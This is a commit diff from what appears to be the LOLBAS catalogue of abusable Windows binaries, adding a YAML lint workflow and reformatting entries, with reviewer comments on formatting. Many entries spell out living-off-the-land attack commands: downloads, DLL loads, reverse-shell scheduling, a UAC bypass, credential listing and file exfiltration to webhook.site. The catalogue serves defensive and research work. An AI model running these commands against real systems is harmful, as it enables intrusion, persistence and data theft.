Merge branch 'master' into master

Oddvar Moe 2021-10-22 16:46:18 +02:00 committed by GitHub
commit 1b15eccf07
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
161 changed files with 1208 additions and 944 deletions

.github/workflows/yamllinting.yml vendored Normal file
View File

@ -0,0 +1,12 @@
---
name: Yaml Lint
on: [push, pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
config_file: .yamllint
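Review bot: both `uses:` references are pinned only to mutable tags, `actions/checkout@v1` and `ibiqlik/action-yamllint@v3`; for a workflow that runs on every push and pull request, pin the third-party action to a full commit SHA so a retagged release cannot change what executes in CI, and move checkout off the v1 line, which is several major versions behind.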

.yamllint Normal file
View File

@ -0,0 +1,15 @@
---
extends: default
yaml-files:
- '*.yml'
rules:
new-line-at-end-of-file:
level: warning
trailing-spaces:
level: warning
line-length:
level: warning
new-lines:
level: warning
indentation:
level: warning
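Review bot: every rule listed under `rules:` is set to `level: warning`, so trailing spaces, bad indentation and missing final newlines are reported but never fail the job; since the files touched in this same commit are being fixed for exactly these problems, consider leaving `indentation` and `trailing-spaces` at their default `error` level, or drop the overrides once the tree is clean. Rules not listed here (for example `key-duplicates`) keep their `default` settings, so structural errors are still caught.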

View File

@ -34,7 +34,6 @@ Resources:
- Link: Threatintelreport...
Acknowledgement:
- Person: John Doe
Handle: @johndoe
Handle: '@johndoe'
- Person: Ola Norman
Handle: @olaNor
---
Handle: '@olaNor'
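Review bot: quoting the handles is the right fix, since `@` is a reserved indicator and cannot start a plain scalar, so the old `Handle: @johndoe` and `Handle: @olaNor` lines do not parse; note that the trailing `---` is dropped from this file while the new files added in this commit end with one, so pick one convention for the trailing marker across `yml/`.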

View File

@ -14,5 +14,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/bohops/status/986984122563391488
Notes: Thanks to Jimmy - @bohops
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
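Review bot: `Notes: Thanks to Jimmy - @bohops` now duplicates the new `Acknowledgement` block; once `Acknowledgement` is the canonical place for credits, clear `Notes` (or reserve it for notes about the technique) so the two fields do not drift apart.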

View File

@ -22,5 +22,6 @@ Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873
Notes: ''
Acknowledgement:
- Person: ''
- Handle: ''
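Review bot: `- Person: ''` and `- Handle: ''` are written as two separate list items, which parses as two mappings (one with only `Person`, one with only `Handle`) instead of one contributor entry; `Handle` should be indented under `Person` as in the other `Acknowledgement` blocks in this commit. Since both values are empty anyway, `Acknowledgement: []` would be cleaner.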

View File

@ -2,8 +2,7 @@
Name: Nltest.exe
Description: Credentials
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: ''
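Review bot: removing the quotes around `Created: 2018-05-25` changes the value's type from a string to a date in parsers that apply the YAML 1.1 schema (PyYAML returns a `datetime.date`), while other files in this same commit keep values such as `Created: '2021-10-07'` quoted; whatever consumes these files now has to handle both, so either quote dates everywhere or unquote them everywhere and make the site generator accept date objects. Dropping the top-level `Categories: []` is fine, since the per-command `Category` key already carries that information.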
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://twitter.com/sysopfb/status/986799053668139009
- https://ss64.com/nt/nltest.html
Notes: Thanks to Sysopfb - @sysopfb
Acknowledgement:
- Person: Sysopfb
Handle: '@sysopfb'

View File

@ -3,7 +3,6 @@ Name: Openwith.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: OpenWith.exe /c C:\test.hta
Description: Opens the target file with the default application.
@ -16,5 +15,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/harr0ey/status/991670870384021504
Notes: Thanks to Matt harr0ey - @harr0ey
Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'

View File

@ -3,7 +3,6 @@ Name: Powershell.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@ -14,5 +13,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
Notes: Thanks to Moriarty - @Moriarty_Meng
Acknowledgement:
- Person: Moriarty
Handle: '@Moriarty_Meng'

View File

@ -18,5 +18,6 @@ Code_Sample: []
Detection: []
Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Notes: 'Thanks to '
Acknowledgement:
- Person: ''
- Handle: ''
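Review bot: `Notes: 'Thanks to '` and the empty `Person`/`Handle` pair carry no information, and `- Person: ''` / `- Handle: ''` as two list items parse as two separate mappings rather than one entry; either fill in the contributor or use `Notes: ''` and `Acknowledgement: []` so the placeholder is not mistaken for a real credit.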

View File

@ -2,7 +2,7 @@
Name: Robocopy.exe
Description: Copy
Author: ''
Created: '2018-05-25'
Created: 2018-05-25
Categories: []
Commands:
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
@ -16,5 +16,6 @@ Code_Sample: []
Detection: []
Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Notes: Thanks to Name of guy - @twitterhandle
Acknowledgement:
- Person: ''
- Handle: ''
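Review bot: `Notes: Thanks to Name of guy - @twitterhandle` is a template placeholder that survived into the data file; replace it with the actual contributor or an empty string, and indent `Handle` under `Person` (as two list items they parse as two mappings, not one entry).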

View File

@ -2,8 +2,7 @@
Name: AcroRd32.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997997818362155008
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Gpup.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Description: Execute another command through gpup.exe (Notepad++ binary).
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997892519827558400
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nlnotes.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon
Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Notes.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon
Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Nvudisp.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Nvudisp.exe System calc.exe
Description: Execute calc.exe as a subprocess.
@ -23,4 +22,7 @@ Code_Sample: []
Detection: []
Resources:
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nvuhda6.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: nvuhda6.exe System calc.exe
Description: Execute calc.exe as a subprocess.
@ -23,4 +22,6 @@ Code_Sample: []
Detection: []
Resources:
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
Notes: Thanks to Adam - @hexacorn
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'

View File

@ -2,8 +2,7 @@
Name: ROCCAT_Swarm.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994213164484001793
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -23,5 +23,5 @@ Resources:
- Link: https://twitter.com/bartblaze/status/1107390776147881984
Acknowledgement:
- Person: Bart
Handle: @bartblaze
Handle: '@bartblaze'
---

View File

@ -2,8 +2,7 @@
Name: Setup.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Run Setup.exe
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994381620588236800
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -3,6 +3,7 @@ Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
Author: 'Jesus Galvez'
Created: '2020-11-01'
Commands:
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
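Review bot: the added `Created: '2020-11-01'` is quoted, whereas the rest of this commit is converting `Created` values to unquoted dates; use the same form here so the field has one type across the corpus.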
@ -14,5 +15,5 @@ Created: '2020-11-01'
Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

View File

@ -2,8 +2,7 @@
Name: Usbinst.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993514357807108096
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: VBoxDrvInst.exe
Description: Persistence
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993497996179492864
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -1,20 +1,20 @@
Name: aswrundll.exe
Description: This process is used by AVAST antivirus to run and execute any modules
Author: Eli Salem
Created: 19\03\2019
Created: '2019-03-19'
Commands:
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
Description: Load and execute modules using aswrundll
Usecase: Execute malicious modules using aswrundll.exe
Category: Execute
Privileges: Any
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Program Files\Avast Software\Avast\aswrundll
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
Code_Sample:
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
Resources:
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement:
- Person: Eli Salem
handle: https://www.linkedin.com/in/eli-salem-954728150
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
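Review bot: the key on the last line is lowercase `handle:` while every other entry uses `Handle:`; since the quoting change touches this line anyway, fix the key at the same time, or tooling that reads `Handle` will silently miss this contributor. The rest of the hunk is sound: the old `- Command:` and `- Code:` values were not valid YAML (two adjacent double-quoted scalars with no separator, and `\P` and `\U` followed by letters do not form valid escapes inside double quotes), so wrapping them in single quotes is the minimal fix. `Created: '2019-03-19'` stays quoted, unlike the other files in this commit.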

View File

@ -2,7 +2,7 @@
Name: winword.exe
Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: winword.exe /l dllfile.dll
Description: Launch DLL payload.
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

View File

@ -2,18 +2,18 @@
Name: testxlst.js
Description: Script included with Pywin32.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution
Category: Execution
Privileges: User
MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
OperatingSystem: Windows
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution
Category: Execution
Privileges: User
MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@ -25,4 +25,6 @@ Detection: []
Resources:
- https://twitter.com/bohops/status/993314069116485632
- https://github.com/mhammond/pywin32
Notes: Thanks to Jimmy - @bohops
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -2,7 +2,7 @@
Name: At.exe
Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith'
Created: '2019-09-20'
Created: 2019-09-20
Commands:
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Description: Create a recurring task to execute every day at a specific time.

View File

@ -2,7 +2,7 @@
Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).

View File

@ -2,7 +2,7 @@
Name: Bash.exe
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe

View File

@ -2,7 +2,7 @@
Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.

yml/OSBinaries/Certoc.yml Normal file
View File

@ -0,0 +1,28 @@
---
Name: CertOC.exe
Description: Used for installing certificates
Author: 'Ensar Samil'
Created: '2021-10-07'
Commands:
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
Description: Loads the target DLL file
Usecase: Execute code within DLL file
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows Server 2022
Full_Path:
- Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection:
- IOC: Process creation with given parameter
- IOC: Unsigned DLL load via certoc.exe
Resources:
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
Acknowledgement:
- Person: Ensar Samil
Handle: '@sblmsrsn'
---
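Review bot: `Code_Sample:` followed by `- Code:` with no value produces a list containing one mapping whose `Code` is null, which is neither the empty list (`Code_Sample: []`) the other entries use nor a real sample; use `[]` here. The `Resources` link carries a `?s=20` tracking parameter that can be dropped, and `Created: '2021-10-07'` is quoted while the rest of the commit unquotes dates.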

View File

@ -2,7 +2,7 @@
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: 'David Middlehurst'
Created: '2020-07-07'
Created: 2020-07-07
Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory

View File

@ -2,7 +2,7 @@
Name: Certutil.exe
Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.

View File

@ -2,7 +2,7 @@
Name: Cmd.exe
Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut'
Created: '2019-06-26'
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: Add content to an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cmdkey /list
Description: List cached credentials

yml/OSBinaries/Cmdl32.yml Normal file
View File

@ -0,0 +1,26 @@
---
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Created: '2021-08-26'
Commands:
- Command: cmdl32 /vpn /lan %cd%\config
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmdl32.exe
- Path: C:\Windows\SysWOW64\cmdl32.exe
Detection:
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
Resources:
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---
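Review bot: the only `Resources` link points back at the project's own pull request (`LOLBAS-Project/LOLBAS/pull/151`) rather than at an external write-up; that is acceptable if the PR is the primary source, but worth confirming. `MitreLink` uses the `attack.mitre.org/techniques/T1105/` form where the rest of the corpus uses `attack.mitre.org/wiki/Technique/...`; both resolve, but the style differs. The two IOCs (the `%TMP%\config.log` entries and the `Microsoft(R) Connection Manager Vpn File Update` user agent) are the most useful part of the entry for defenders.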

View File

@ -2,7 +2,7 @@
Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira'
Created: '04/09/2020'
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
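Review bot: `'04/09/2020'` is ambiguous and the conversion to `2020-09-04` assumes day-first; if the original was month-first the entry dates from 9 April, so confirm with the author before fixing the value in place. While here, the second and third sentences of `Description` ("you can configure different pilot collections for each of the co-management workloads...") read as pasted from unrelated Configuration Manager documentation and describe nothing about this binary's upload behaviour; trimming them would help.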

View File

@ -2,7 +2,7 @@
Name: Control.exe
Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Csc.exe
Description: Binary file used by .NET to compile C# code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.

View File

@ -2,7 +2,7 @@
Name: Cscript.exe
Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 28/06/2020
Created: 2020-06-28
Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen

View File

@ -2,7 +2,7 @@
Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url

View File

@ -2,7 +2,7 @@
Name: Diantz.exe
Description: Binary that package existing files into a cabinet (.cab) file
Author: 'Tamir Yehuda'
Created: '08/08/2020'
Created: 2020-08-08
Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.

View File

@ -2,7 +2,7 @@
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.

View File

@ -2,7 +2,7 @@
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.

View File

@ -2,7 +2,7 @@
Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek'
Created: '2018-11-01'
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
@ -15,7 +15,7 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe
Code Sample:
Code_Sample:
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Detection:
- IOC: eventvwr.exe launching child process other than mmc.exe

View File

@ -2,7 +2,7 @@
Name: Expand.exe
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: Copies source file to destination.

View File

@ -2,7 +2,7 @@
Name: Explorer.exe
Description: Binary used for managing files and system components within Windows
Author: 'Jai Minton'
Created: '2020-06-24'
Created: 2020-06-24
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe

View File

@ -2,7 +2,7 @@
Name: Extexport.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll

View File

@ -2,7 +2,7 @@
Name: Extrac32.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Findstr.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

View File

@ -2,7 +2,7 @@
Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.

View File

@ -2,7 +2,7 @@
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Created: '2018-12-10'
Created: 2018-12-10
Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file.

View File

@ -2,7 +2,7 @@
Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Created: Jesus Galvez
Created: 2019-12-27
Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
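Review bot: the old `Created: Jesus Galvez` was clearly a copy of the `Author` line, but the replacement `2019-12-27` does not come from anything visible in the diff; a pointer in the commit or PR to where the date was taken from (the entry's original PR or the file's history) would make it verifiable. `Author: Jesus Galvez` is also unquoted while most `Author` values in the repository are single-quoted; harmless, but inconsistent.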

View File

@ -2,7 +2,7 @@
Name: Gpscript.exe
Description: Used by group policy to process scripts
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Gpscript /logon
Description: Executes logon scripts configured in Group Policy.

View File

@ -2,7 +2,7 @@
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.

View File

@ -2,7 +2,7 @@
Name: Ie4uinit.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
